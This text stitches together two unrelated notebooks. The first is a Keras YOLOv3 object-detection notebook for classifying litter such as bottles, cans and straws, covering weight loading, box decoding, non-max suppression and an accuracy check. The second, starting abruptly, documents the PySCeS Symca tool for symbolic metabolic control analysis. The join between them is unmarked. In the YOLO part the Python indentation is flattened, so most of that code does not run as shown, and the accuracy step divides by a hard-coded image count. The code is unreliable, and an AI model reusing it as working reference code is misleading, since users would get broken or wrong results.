x = _conv_block(input_image, [{'filter': 32, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 0},
{'filter': 64, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 1},
{'filter': 32, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 2},
{'filter': 64, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 3}])
# Layer 5 => 8
x = _conv_block(x, [{'filter': 128, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 5},
{'filter': 64, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 6},
{'filter': 128, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 7}])
# Layer 9 => 11
x = _conv_block(x, [{'filter': 64, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 9},
{'filter': 128, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 10}])
# Layer 12 => 15
x = _conv_block(x, [{'filter': 256, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 12},
{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 13},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 14}])
# Layer 16 => 36
for i in range(7):
x = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 16+i*3},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 17+i*3}])
skip_36 = x
# Layer 37 => 40
x = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 37},
{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 38},
{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 39}])
# Layer 41 => 61
for i in range(7):
x = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 41+i*3},
{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 42+i*3}])
skip_61 = x
# Layer 62 => 65
x = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 62},
{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 63},
{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 64}])
# Layer 66 => 74
for i in range(3):
x = _conv_block(x, [{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 66+i*3},
{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 67+i*3}])
# Layer 75 => 79
x = _conv_block(x, [{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 75},
{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 76},
{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 77},
{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 78},
{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 79}], skip=False)
# Layer 80 => 82
yolo_82 = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 80},
{'filter': 54, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'layer_idx': 81}], skip=False)
# Layer 83 => 86
x = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 84}], skip=False)
x = UpSampling2D(2)(x)
x = concatenate([x, skip_61])
# Layer 87 => 91
x = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 87},
{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 88},
{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 89},
{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 90},
{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 91}], skip=False)
# Layer 92 => 94
yolo_94 = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 92},
{'filter': 54, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'layer_idx': 93}], skip=False)
# Layer 95 => 98
x = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 96}], skip=False)
x = UpSampling2D(2)(x)
x = concatenate([x, skip_36])
# Layer 99 => 106
yolo_106 = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 99},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 100},
{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 101},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 102},
{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 103},
{'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 104},
{'filter': 54, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'layer_idx': 105}], skip=False)
model = Model(input_image, [yolo_82, yolo_94, yolo_106])
return model
```
**Read and Load the pre-trained model weight**
```
class WeightReader:
def __init__(self, weight_file):
with open(weight_file, 'rb') as w_f:
major, = struct.unpack('i', w_f.read(4))
minor, = struct.unpack('i', w_f.read(4))
revision, = struct.unpack('i', w_f.read(4))
if (major*10 + minor) >= 2 and major < 1000 and minor < 1000:
w_f.read(8)
else:
w_f.read(4)
transpose = (major > 1000) or (minor > 1000)
binary = w_f.read()
self.offset = 0
self.all_weights = np.frombuffer(binary, dtype='float32')
def read_bytes(self, size):
self.offset = self.offset + size
return self.all_weights[self.offset-size:self.offset]
def load_weights(self, model):
for i in range(106):
try:
conv_layer = model.get_layer('conv_' + str(i))
print("loading weights of convolution #" + str(i))
if i not in [81, 93, 105]:
norm_layer = model.get_layer('bnorm_' + str(i))
size = np.prod(norm_layer.get_weights()[0].shape)
beta = self.read_bytes(size) # bias
gamma = self.read_bytes(size) # scale
mean = self.read_bytes(size) # mean
var = self.read_bytes(size) # variance
norm_layer.set_weights([gamma, beta, mean, var])
if len(conv_layer.get_weights()) > 1:
bias = self.read_bytes(np.prod(conv_layer.get_weights()[1].shape))
kernel = self.read_bytes(np.prod(conv_layer.get_weights()[0].shape))
kernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))
kernel = kernel.transpose([2,3,1,0])
conv_layer.set_weights([kernel, bias])
else:
kernel = self.read_bytes(np.prod(conv_layer.get_weights()[0].shape))
kernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))
kernel = kernel.transpose([2,3,1,0])
conv_layer.set_weights([kernel])
except ValueError:
print("no convolution #" + str(i))
def reset(self):
self.offset = 0
```
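The header logic above can be checked against a synthetic weights file: Darknet writes three little-endian int32 version fields, followed by a "seen" counter that is 8 bytes from version 0.2 onward and 4 bytes before that. A stdlib sketch with a fabricated in-memory file (the byte values are made up for illustration):

```python
import io, struct

# Build a fake Darknet-style header: major=0, minor=2, revision=0,
# then an 8-byte 'seen' counter (because major*10 + minor >= 2)
header = struct.pack('3i', 0, 2, 0) + struct.pack('q', 12345)
w_f = io.BytesIO(header + b'\x00' * 16)   # 16 bytes of fake float32 weights

major, minor, revision = struct.unpack('3i', w_f.read(12))
if (major * 10 + minor) >= 2 and major < 1000 and minor < 1000:
    w_f.read(8)   # versions >= 0.2 store a 64-bit 'seen' counter
else:
    w_f.read(4)   # older versions store a 32-bit counter
weights = w_f.read()  # everything after the header is raw float32 weight data
print(major, minor, revision, len(weights))  # 0 2 0 16
```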
**Define the model**
```
model = make_yolov3_model()
```
**Call class WeightReader to read the weight & load to the model**
```
weight_reader = WeightReader("/content/drive/MyDrive/yolo_custom_model_Training/backup/test_cfg_20000.weights")
weight_reader.load_weights(model)
```
**We will use a pre-trained model to perform object detection**
```
import numpy as np
from matplotlib import pyplot
from matplotlib.patches import Rectangle
from numpy import expand_dims
from keras.models import load_model
from keras.preprocessing.image import load_img
from keras.preprocessing.image import img_to_array
# define the expected input shape for the model
input_w, input_h = 416, 416
```
**Draw bounding box on the images**
```
class BoundBox:
def __init__(self, xmin, ymin, xmax, ymax, objness = None, classes = None):
self.xmin = xmin
self.ymin = ymin
self.xmax = xmax
self.ymax = ymax
self.objness = objness
self.classes = classes
self.label = -1
self.score = -1
def get_label(self):
if self.label == -1:
self.label = np.argmax(self.classes)
return self.label
def get_score(self):
if self.score == -1:
self.score = self.classes[self.get_label()]
return self.score
def _sigmoid(x):
return 1. / (1. + np.exp(-x))
def decode_netout(netout, anchors, obj_thresh, net_h, net_w):
grid_h, grid_w = netout.shape[:2] # 0 and 1 is row and column 13*13
nb_box = 3 # 3 anchor boxes
netout = netout.reshape((grid_h, grid_w, nb_box, -1)) #13*13*3 ,-1
nb_class = netout.shape[-1] - 5
boxes = []
netout[..., :2] = _sigmoid(netout[..., :2])
netout[..., 4:] = _sigmoid(netout[..., 4:])
netout[..., 5:] = netout[..., 4][..., np.newaxis] * netout[..., 5:]
netout[..., 5:] *= netout[..., 5:] > obj_thresh
for i in range(grid_h*grid_w):
row = i // grid_w
col = i % grid_w
for b in range(nb_box):
# 4th element is objectness score
objectness = netout[int(row)][int(col)][b][4]
if(objectness.all() <= obj_thresh): continue
# first 4 elements are x, y, w, and h
x, y, w, h = netout[int(row)][int(col)][b][:4]
x = (col + x) / grid_w # center position, unit: image width
y = (row + y) / grid_h # center position, unit: image height
w = anchors[2 * b + 0] * np.exp(w) / net_w # unit: image width
h = anchors[2 * b + 1] * np.exp(h) / net_h # unit: image height
# last elements are class probabilities
classes = netout[int(row)][col][b][5:]
box = BoundBox(x-w/2, y-h/2, x+w/2, y+h/2, objectness, classes)
boxes.append(box)
return boxes
def correct_yolo_boxes(boxes, image_h, image_w, net_h, net_w):
new_w, new_h = net_w, net_h
for i in range(len(boxes)):
x_offset, x_scale = (net_w - new_w)/2./net_w, float(new_w)/net_w
y_offset, y_scale = (net_h - new_h)/2./net_h, float(new_h)/net_h
boxes[i].xmin = int((boxes[i].xmin - x_offset) / x_scale * image_w)
boxes[i].xmax = int((boxes[i].xmax - x_offset) / x_scale * image_w)
boxes[i].ymin = int((boxes[i].ymin - y_offset) / y_scale * image_h)
boxes[i].ymax = int((boxes[i].ymax - y_offset) / y_scale * image_h)
```
**Intersection over Union - Actual bounding box vs predicted bounding box**
```
def _interval_overlap(interval_a, interval_b):
x1, x2 = interval_a
x3, x4 = interval_b
if x3 < x1:
if x4 < x1:
return 0
else:
return min(x2,x4) - x1
else:
if x2 < x3:
return 0
else:
return min(x2,x4) - x3
#intersection over union
def bbox_iou(box1, box2):
intersect_w = _interval_overlap([box1.xmin, box1.xmax], [box2.xmin, box2.xmax])
intersect_h = _interval_overlap([box1.ymin, box1.ymax], [box2.ymin, box2.ymax])
intersect = intersect_w * intersect_h
w1, h1 = box1.xmax-box1.xmin, box1.ymax-box1.ymin
w2, h2 = box2.xmax-box2.xmin, box2.ymax-box2.ymin
#Union(A,B) = A + B - Inter(A,B)
union = w1*h1 + w2*h2 - intersect
return float(intersect) / union
```
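As a sanity check, the interval-overlap logic above can be reproduced with plain tuples (a sketch, not the class-based implementation above; here a box is just an `(xmin, ymin, xmax, ymax)` tuple rather than a `BoundBox`):

```python
def interval_overlap(a, b):
    # overlap length of two 1-D intervals (0 if they are disjoint)
    (x1, x2), (x3, x4) = a, b
    return max(0, min(x2, x4) - max(x1, x3))

def iou(box1, box2):
    # box = (xmin, ymin, xmax, ymax)
    iw = interval_overlap((box1[0], box1[2]), (box2[0], box2[2]))
    ih = interval_overlap((box1[1], box1[3]), (box2[1], box2[3]))
    inter = iw * ih
    a1 = (box1[2] - box1[0]) * (box1[3] - box1[1])
    a2 = (box2[2] - box2[0]) * (box2[3] - box2[1])
    # Union(A, B) = A + B - Inter(A, B)
    return inter / float(a1 + a2 - inter)

# two 2x2 boxes overlapping in a 1x1 square: IoU = 1 / (4 + 4 - 1) = 1/7
print(iou((0, 0, 2, 2), (1, 1, 3, 3)))
```

Identical boxes give an IoU of 1.0 and disjoint boxes give 0.0, which is the property NMS relies on in the next step.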
**Non-Max Suppression - keep only the highest-probability bounding boxes**
```
#boxes from correct_yolo_boxes and decode_netout
def do_nms(boxes, nms_thresh):
if len(boxes) > 0:
nb_class = len(boxes[0].classes)
else:
return
for c in range(nb_class):
sorted_indices = np.argsort([-box.classes[c] for box in boxes])
for i in range(len(sorted_indices)):
index_i = sorted_indices[i]
if boxes[index_i].classes[c] == 0: continue
for j in range(i+1, len(sorted_indices)):
index_j = sorted_indices[j]
if bbox_iou(boxes[index_i], boxes[index_j]) >= nms_thresh:
boxes[index_j].classes[c] = 0
```
**Load and Prepare images**
```
def load_image_pixels(filename, shape):
# load the image to get its shape
image = load_img(filename) #load_img() Keras function to load the image .
width, height = image.size
# load the image with the required size
image = load_img(filename, target_size=shape) # target_size argument to resize the image after loading
# convert to numpy array
image = img_to_array(image)
# scale pixel values to [0, 1]
image = image.astype('float32')
image /= 255.0 #rescale the pixel values from 0-255 to 0-1 32-bit floating point values.
# add a dimension so that we have one sample
image = expand_dims(image, 0)
return image, width, height
```
**Save all of the boxes above the threshold**
```
def get_boxes(boxes, labels, thresh):
v_boxes, v_labels, v_scores = list(), list(), list()
# enumerate all boxes
for box in boxes:
# enumerate all possible labels
for i in range(len(labels)):
# check if the threshold for this label is high enough
if box.classes[i] > thresh:
v_boxes.append(box)
v_labels.append(labels[i])
v_scores.append(box.classes[i]*100)
return v_boxes, v_labels, v_scores
```
**Draw all the boxes based on the information from the previous step**
```
def draw_boxes(filename, v_boxes, v_labels, v_scores):
# load the image
data = pyplot.imread(filename)
# plot the image
pyplot.imshow(data)
# get the context for drawing boxes
ax = pyplot.gca()
# plot each box
for i in range(len(v_boxes)):
#by retrieving the coordinates from each bounding box and creating a Rectangle object.
box = v_boxes[i]
# get coordinates
y1, x1, y2, x2 = box.ymin, box.xmin, box.ymax, box.xmax
# calculate width and height of the box
width, height = x2 - x1, y2 - y1
# create the shape
rect = Rectangle((x1, y1), width, height, fill=False, color='white')
# draw the box
ax.add_patch(rect)
# draw text and score in top left corner
label = "%s (%.3f)" % (v_labels[i], v_scores[i])
pyplot.text(x1, y1, label, color='white')
# show the plot
pyplot.show()
```
### **Detection**
```
import os
%cd '/content/drive/MyDrive/yolo_custom_model_Training/custom_data/'
input_w, input_h = 416, 416
anchors = [[116,90, 156,198, 373,326], [30,61, 62,45, 59,119], [10,13, 16,30, 33,23]]
class_threshold = 0.15
pred_right = 0
labels = ['clear_plastic_bottle','plastic_bottle_cap','drink_can','plastic_straw','paper_straw',
'disposable_plastic_cup','styrofoam_piece','glass_bottle','pop_tab','paper_bag','plastic_utensils',
'normal_paper','plastic_lid']
filepath = '/content/drive/MyDrive/yolo_custom_model_Training/custom_data/'
for im in os.listdir(filepath):
image, image_w, image_h = load_image_pixels(im, (input_w, input_h))
yhat = model.predict(image)
boxes = list()
for i in range(len(yhat)):
boxes += decode_netout(yhat[i][0], anchors[i], class_threshold, input_h, input_w)
correct_yolo_boxes(boxes, image_h, image_w, input_h, input_w)
do_nms(boxes, 0.1)
v_boxes, v_labels, v_scores = get_boxes(boxes, labels, class_threshold)
if len(v_labels)!=0:
    image_name = os.path.splitext(im)[0]
    if image_name[:-3] == v_labels[0]:
      pred_right += 1
accuracy = '{:.2%}'.format(pred_right/130)  # 130 = number of test images in the folder
print("the detection accuracy is " + accuracy)
pred_right
```
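The filename-to-label matching above assumes each file is named `<label><3-digit index>.<ext>` (e.g. `drink_can001.jpg`). A slightly more robust sketch using `os.path.splitext`, so filenames with extra dots or directory prefixes do not break the split (the helper name `label_from_filename` is ours, not part of the original code):

```python
import os

def label_from_filename(filename, index_len=3):
    # strip directory and extension, then drop the trailing numeric index
    stem, _ext = os.path.splitext(os.path.basename(filename))
    return stem[:-index_len]

print(label_from_filename('drink_can001.jpg'))  # -> drink_can
```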
```
################################ NOTES ##############################ex
# Lines of code that are to be excluded from the documentation are #ex
# marked with `#ex` at the end of the line. #ex
# #ex
# To ensure that figures are displayed correctly together with widgets #ex
# in the sphinx documentation we will include screenshots of some of #ex
# the produced figures. #ex
# Do not run cells with the `display(Image('path_to_image'))` code to #ex
# avoid duplication of results in the notebook. #ex
# #ex
# Some reStructuredText 2 (ReST) syntax is included to aid in #ex
# conversion to ReST for the sphinx documentation. #ex
#########################################################################ex
notebook_dir = %pwd #ex
import pysces #ex
import psctb #ex
import numpy #ex
from os import path #ex
from IPython.display import display, Image #ex
from sys import platform #ex
%matplotlib inline
```
# Symca
Symca is used to perform symbolic metabolic control analysis [[3,4]](references.html) on metabolic pathway models in order to dissect the control properties of these pathways in terms of the different chains of local effects (or control patterns) that make up the total control coefficient values. Symbolic/algebraic expressions are generated for each control coefficient in a pathway which can be subjected to further analysis.
## Features
* Generates symbolic expressions for each control coefficient of a metabolic pathway model.
* Splits control coefficients into control patterns that indicate the contribution of different chains of local effects.
* Control coefficient and control pattern expressions can be manipulated using standard `SymPy` functionality.
* Control coefficient and control pattern values are determined automatically and are updated automatically following the calculation of standard (non-symbolic) control coefficient values after a parameter alteration.
* Analysis sessions (raw expression data) can be saved to disk for later use.
* The effect of parameter scans on control coefficient and control pattern values can be generated and displayed using `ScanFig`.
* Visualisation of control patterns by using `ModelGraph` functionality.
* Saving/loading of `Symca` sessions.
* Saving of control pattern results.
## Usage and feature walkthrough
### Workflow
Performing symbolic control analysis with `Symca` usually requires the following steps:
1. Instantiation of a `Symca` object using a `PySCeS` model object.
2. Generation of symbolic control coefficient expressions.
3. Access generated control coefficient expression results via `cc_results` and the corresponding control coefficient name (see [Basic Usage](basic_usage.ipynb#syntax))
4. Inspection of control coefficient values.
5. Inspection of control pattern values and their contributions towards the total control coefficient values.
6. Inspection of the effect of parameter changes (parameter scans) on the values of control coefficients and control patterns and the contribution of control patterns towards control coefficients.
7. Session/result saving if required
8. Further analysis.
### Object instantiation
Instantiation of a `Symca` analysis object requires a `PySCeS` model object (`PysMod`) as an argument. Using the included [lin4_fb.psc](included_files.html#lin4-fb-psc) model, a `Symca` session is instantiated as follows:
```
mod = pysces.model('lin4_fb')
sc = psctb.Symca(mod)
```
Additionally `Symca` has the following arguments:
* `internal_fixed`: This must be set to `True` in the case where an internal metabolite has a fixed concentration *(default: `False`)*
* `auto_load`: If `True` `Symca` will try to load a previously saved session. Saved data is unaffected by the `internal_fixed` argument above *(default: `False`)*.
.. note:: For the case where an internal metabolite is fixed see [Fixed internal metabolites](Symca.ipynb#fixed-internal-metabolites) below.
### Generating symbolic control coefficient expressions
Control coefficient expressions can be generated as soon as a `Symca` object has been instantiated using the `do_symca` method. This process can potentially take quite some time to complete, therefore we recommend saving the generated expressions for later loading (see [Saving/Loading Sessions](Symca.ipynb#saving-loading-sessions) below). In the case of `lin4_fb.psc` expressions should be generated within a few seconds.
```
sc.do_symca()
```
`do_symca` has the following arguments:
* `internal_fixed`: This must be set to `True` in the case where an internal metabolite has a fixed concentration *(default: `False`)*
* `auto_save_load`: If set to `True` `Symca` will attempt to load a previously saved session and only generate new expressions in case of a failure. After generation of new results, these results will be saved instead. Setting `internal_fixed` to `True` does not affect previously saved results that were generated with this argument set to `False` *(default: `False`)*.
### Accessing control coefficient expressions
Generated results may be accessed via a dictionary-like `cc_results` object (see [Basic Usage - Tables](basic_usage.ipynb#tables)). Inspecting this `cc_results` object in an IPython/Jupyter notebook yields a table of control coefficient values:
```
sc.cc_results
```
Inspecting an individual control coefficient yields a symbolic expression together with a value:
```
sc.cc_results.ccJR1_R4
```
In the above example, the expression of the control coefficient consists of two numerator terms and a common denominator shared by all the control coefficient expressions, signified by $\Sigma$.
Various properties of this control coefficient can be accessed such as the:
* Expression (as a `SymPy` expression)
```
sc.cc_results.ccJR1_R4.expression
```
* Numerator expression (as a `SymPy` expression)
```
sc.cc_results.ccJR1_R4.numerator
```
* Denominator expression (as a `SymPy` expression)
```
sc.cc_results.ccJR1_R4.denominator
```
* Value (as a `float64`)
```
sc.cc_results.ccJR1_R4.value
```
Additional, less pertinent, attributes are `abs_value`, `latex_expression`, `latex_expression_full`, `latex_numerator`, `latex_name`, `name` and `denominator_object`.
The individual control coefficient numerator terms, otherwise known as control patterns, may also be accessed as follows:
```
sc.cc_results.ccJR1_R4.CP001
sc.cc_results.ccJR1_R4.CP002
```
Each control pattern is numbered arbitrarily starting from 001 and has properties similar to those of the control coefficient object (i.e., its expression, numerator, value, etc. can also be accessed).
#### Control pattern percentage contribution
Additionally control patterns have a `percentage` field which indicates the degree to which a particular control pattern contributes towards the overall control coefficient value:
```
sc.cc_results.ccJR1_R4.CP001.percentage
sc.cc_results.ccJR1_R4.CP002.percentage
```
Unlike conventional percentages, however, these values are calculated as the percentage contribution towards the sum of the absolute values of all the control patterns (rather than as a percentage of the total control coefficient value). This is done to account for situations where control pattern values have different signs.
A particularly problematic example of where the above method is necessary, is a hypothetical control coefficient with a value of zero, but with two control patterns with equal value but opposite signs. In this case a conventional percentage calculation would lead to an undefined (`NaN`) result, whereas our methodology would indicate that each control pattern is equally ($50\%$) responsible for the observed control coefficient value.
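The arithmetic behind this can be sketched with a hypothetical two-pattern coefficient (the values are illustrative, not taken from `lin4_fb`):

```python
# hypothetical control pattern values that sum to a zero-valued coefficient
patterns = [0.5, -0.5]
total = sum(patterns)                      # 0.0 -> a naive percentage would divide by zero
abs_total = sum(abs(p) for p in patterns)  # 1.0
percentages = [100 * abs(p) / abs_total for p in patterns]
print(percentages)  # each pattern contributes 50%
```

Dividing by the sum of absolute values keeps the contributions well-defined even when the total coefficient value is zero.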
### Dynamic value updating
The values of the control coefficients and their control patterns are automatically updated when new steady-state
elasticity coefficients are calculated for the model. Thus changing a parameter of `lin4_fb`, such as the $V_{f}$ value of reaction 4, will lead to new control coefficient and control pattern values:
```
mod.reLoad()
# mod.Vf_4 has a default value of 50
mod.Vf_4 = 0.1
# calculating new steady state
mod.doMca()
# now ccJR1_R4 and its two control patterns should have new values
sc.cc_results.ccJR1_R4
# original value was 0.000
sc.cc_results.ccJR1_R4.CP001
# original value was 0.964
sc.cc_results.ccJR1_R4.CP002
# resetting to default Vf_4 value and recalculating
mod.reLoad()
mod.doMca()
```
### Control pattern graphs
As described under [Basic Usage](basic_usage.ipynb#graphic-representation-of-metabolic-networks), `Symca` has the functionality to display the chains of local effects represented by control patterns on a scheme of a metabolic model. This functionality can be accessed via the `highlight_patterns` method:
```
# This path leads to the provided layout file
path_to_layout = '~/Pysces/psc/lin4_fb.dict'
# Correct path depending on platform - necessary for platform independent scripts
if platform == 'win32' and pysces.version.current_version_tuple() < (0,9,8):
path_to_layout = psctb.utils.misc.unix_to_windows_path(path_to_layout)
else:
path_to_layout = path.expanduser(path_to_layout)
sc.cc_results.ccJR1_R4.highlight_patterns(height = 350, pos_dic=path_to_layout)
# To avoid duplication - do not run #ex
display(Image(path.join(notebook_dir,'images','sc_model_graph_1.png'))) #ex
```
`highlight_patterns` has the following optional arguments:
* `width`: Sets the width of the graph (*default*: 900).
* `height`:Sets the height of the graph (*default*: 500).
* `show_dummy_sinks`: If `True`, reactants with "dummy" or "sink" in their names will not be displayed (*default*: `False`).
* `show_external_modifier_links`: If `True` edges representing the interaction of external effectors with reactions will be shown (*default*: `False`).
Clicking either of the two buttons representing the control patterns highlights these patterns according to their percentage contribution (as discussed [above](Symca.ipynb#control-pattern-percentage-contribution)) towards the total control coefficient.
```
# clicking on CP002 shows that this control pattern representing
# the chain of effects passing through the feedback loop
# is totally responsible for the observed control coefficient value.
sc.cc_results.ccJR1_R4.highlight_patterns(height = 350, pos_dic=path_to_layout)
# To avoid duplication - do not run #ex
display(Image(path.join(notebook_dir,'images','sc_model_graph_2.png'))) #ex
# clicking on CP001 shows that this control pattern representing
# the chain of effects of the main pathway does not contribute
# at all to the control coefficient value.
sc.cc_results.ccJR1_R4.highlight_patterns(height = 350, pos_dic=path_to_layout)
# To avoid duplication - do not run #ex
display(Image(path.join(notebook_dir,'images','sc_model_graph_3.png'))) #ex
```
### Parameter scans
Parameter scans can be performed in order to determine the effect of a parameter change on either the control coefficient and control pattern values or of the effect of a parameter change on the contribution of the control patterns towards the control coefficient (as discussed [above](Symca.ipynb#control-pattern-percentage-contribution)). The procedures for both the "value" and "percentage" scans are very much the same and rely on the same principles as described in the [Basic Usage](basic_usage.ipynb#plotting-and-displaying-results) and [RateChar](RateChar.ipynb#plotting-results) sections.
To perform a parameter scan the `do_par_scan` method is called. This method has the following arguments:
* `parameter`: A String representing the parameter which should be varied.
* `scan_range`: Any iterable representing the range of values over which to vary the parameter (typically a NumPy `ndarray` generated by `numpy.linspace` or `numpy.logspace`).
* `scan_type`: Either `"percentage"` or `"value"` as described above (*default*: `"percentage"`).
* `init_return`: If `True` the parameter value will be reset to its initial value after performing the parameter scan (*default*: `True`).
* `par_scan`: If `True`, the parameter scan will be performed by multiple parallel processes rather than a single process, thus speeding performance (*default*: `False`).
* `par_engine`: Specifies the engine to be used for the parallel scanning processes. Can either be `"multiproc"` or `"ipcluster"`. A discussion of the differences between these methods is beyond the scope of this document; see [here](http://www.davekuhlman.org/python_multiprocessing_01.html) for a brief overview of multiprocessing in Python (*default*: `"multiproc"`).
* `force_legacy`: If `True`, `do_par_scan` will use an older and slower algorithm to perform the parameter scan. This is mostly used for debugging purposes (*default*: `False`).
Below we will perform a percentage scan of $V_{f4}$ for 200 points between 0.1 and 1000 in log space:
```
percentage_scan_data = sc.cc_results.ccJR1_R4.do_par_scan(parameter='Vf_4',
scan_range=numpy.logspace(-1,3,200),
scan_type='percentage')
```
As previously described, these data can be displayed using `ScanFig` by calling the `plot` method of `percentage_scan_data`. Furthermore, lines can be enabled/disabled using the `toggle_category` method of `ScanFig` or by clicking on the appropriate buttons:
```
percentage_scan_plot = percentage_scan_data.plot()
# set the x-axis to a log scale
percentage_scan_plot.ax.semilogx()
# enable all the lines
percentage_scan_plot.toggle_category('Control Patterns', True)
percentage_scan_plot.toggle_category('CP001', True)
percentage_scan_plot.toggle_category('CP002', True)
# display the plot
percentage_scan_plot.interact()
#remove_next
# To avoid duplication - do not run #ex
display(Image(path.join(notebook_dir,'images','sc_perscan.png'))) #ex
```
A `value` plot can similarly be generated and displayed. In this case, however, an additional line indicating $C^{J}_{4}$ will also be present:
```
value_scan_data = sc.cc_results.ccJR1_R4.do_par_scan(parameter='Vf_4',
scan_range=numpy.logspace(-1,3,200),
scan_type='value')
value_scan_plot = value_scan_data.plot()
# set the x-axis to a log scale
value_scan_plot.ax.semilogx()
# enable all the lines
value_scan_plot.toggle_category('Control Coefficients', True)
value_scan_plot.toggle_category('ccJR1_R4', True)
value_scan_plot.toggle_category('Control Patterns', True)
value_scan_plot.toggle_category('CP001', True)
value_scan_plot.toggle_category('CP002', True)
# display the plot
value_scan_plot.interact()
#remove_next
# To avoid duplication - do not run #ex
display(Image(path.join(notebook_dir,'images','sc_valscan.png'))) #ex
```
### Fixed internal metabolites
In the case where the concentration of an internal intermediate is fixed (such as in the case of a GSDA) the `internal_fixed` argument must be set to `True` in either the `do_symca` method, or when instantiating the `Symca` object. This will typically result in the creation of a `cc_results_N` object for each separate reaction block, where `N` is a number starting at 0. Results can then be accessed via these objects as with normal free internal intermediate models.
Thus, for a variant of the `lin4_fb` model where the intermediate `S3` is fixed at its steady-state value, the procedure is as follows:
```
# Create a variant of mod with 'S3' fixed at its steady-state value
mod_fixed_S3 = psctb.modeltools.fix_metabolite_ss(mod, 'S3')
# Instantiate a Symca object with the 'internal_fixed' argument set to 'True'
sc_fixed_S3 = psctb.Symca(mod_fixed_S3, internal_fixed=True)
# Run the 'do_symca' method ('internal_fixed' can also be set to 'True' here)
sc_fixed_S3.do_symca()
```
The normal `sc_fixed_S3.cc_results` object is still generated, but will be invalid for the fixed model. Each additional `cc_results_N` contains control coefficient expressions that have the same common denominator and corresponds to a specific reaction block. These `cc_results_N` objects are numbered arbitrarily, but consistently across different sessions. Each results object is accessed and utilised in the same way as the normal `cc_results` object.
For the `mod_fixed_S3` model two additional results objects (`cc_results_0` and `cc_results_1`) are generated:
* `cc_results_1` contains the control coefficients describing the sensitivity of flux and concentrations within the supply block of `S3` towards reactions within the supply block.
```
sc_fixed_S3.cc_results_1
```
* `cc_results_0` contains the control coefficients describing the sensitivity of flux and concentrations of either reaction block towards reactions in the other reaction block (i.e., all control coefficients here should be zero). Because the `S3` demand block consists of a single reaction, this object also contains the control coefficient of `R4` on `J_R4`, which is equal to one. This results object is useful for confirming that the results were generated as expected.
```
sc_fixed_S3.cc_results_0
```
